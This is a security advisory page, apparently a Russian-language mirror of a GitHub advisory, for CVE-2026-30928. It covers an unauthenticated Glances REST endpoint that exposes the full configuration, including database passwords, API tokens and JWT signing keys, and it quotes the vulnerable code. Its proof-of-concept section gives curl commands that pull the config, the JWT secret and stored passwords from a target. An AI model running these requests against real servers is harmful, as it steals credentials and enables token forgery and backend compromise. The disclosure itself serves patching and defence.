GHSA-gh4x-f7cq-wwx6

Опубликовано: 09 мар. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.7

Описание

Glances Exposes Unauthenticated Configuration Secrets

Summary

The /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords.

Details

Root Cause: The as_dict() method in config.py iterates over every section and every key in the ConfigParser and returns them all as a flat dictionary. No sensitive key filtering or redaction is applied.

Affected Code:

File: glances/outputs/glances_restful_api.py, lines 1154-1167

def _api_config(self): """Glances API RESTful implementation. Return the JSON representation of the Glances configuration file HTTP/200 if OK HTTP/404 if others error """ try: # Get the RAW value of the config' dict args_json = self.config.as_dict() # <-- Returns ALL config including secrets except Exception as e: raise HTTPException(status.HTTP_404_NOT_FOUND, f"Cannot get config ({str(e)})") else: return GlancesJSONResponse(args_json)

File: glances/config.py, lines 280-287

def as_dict(self): """Return the configuration as a dict""" dictionary = {} for section in self.parser.sections(): dictionary[section] = {} for option in self.parser.options(section): dictionary[section][option] = self.parser.get(section, option) # No filtering return dictionary

File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication bypass)

if self.args.password: router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)]) else: router = APIRouter(prefix=self.url_prefix) # No authentication!

PoC

Start Glances in default webserver mode:

glances -w # Glances web server started on http://0.0.0.0:61208/

From any network-reachable host, retrieve all configuration secrets:

# Get entire config including all credentials curl http://target:61208/api/4/config

Step 3: Extract specific secrets:

# Get JWT secret key for token forgery curl http://target:61208/api/4/config/outputs/jwt_secret_key # Get InfluxDB token curl http://target:61208/api/4/config/influxdb2/token # Get all stored server passwords curl http://target:61208/api/4/config/passwords

Impact

Full Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) allow direct access to all connected backend data stores.

Ссылки

Пакеты

Наименование

Glances

pip

Затронутые версииВерсия исправления

< 4.5.1

4.5.1

EPSS

Процентиль: 87%

0.03371

Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-30928

Дефекты

CWE-200

Связанные уязвимости

CVE-2026-30928

CVSS3: 7.5

ubuntu

19 дней назад

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, the /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords. This vulnerability is fixed in 4.5.1.

CVE-2026-30928

CVSS3: 7.5

nvd

19 дней назад

CVE-2026-30928

CVSS3: 7.5

debian

19 дней назад

Glances is an open-source system cross-platform monitoring tool. Prior ...

EPSS

Процентиль: 87%

0.03371

Низкий

8.7 High

CVSS4

CVE ID

CVE-2026-30928

Дефекты

CWE-200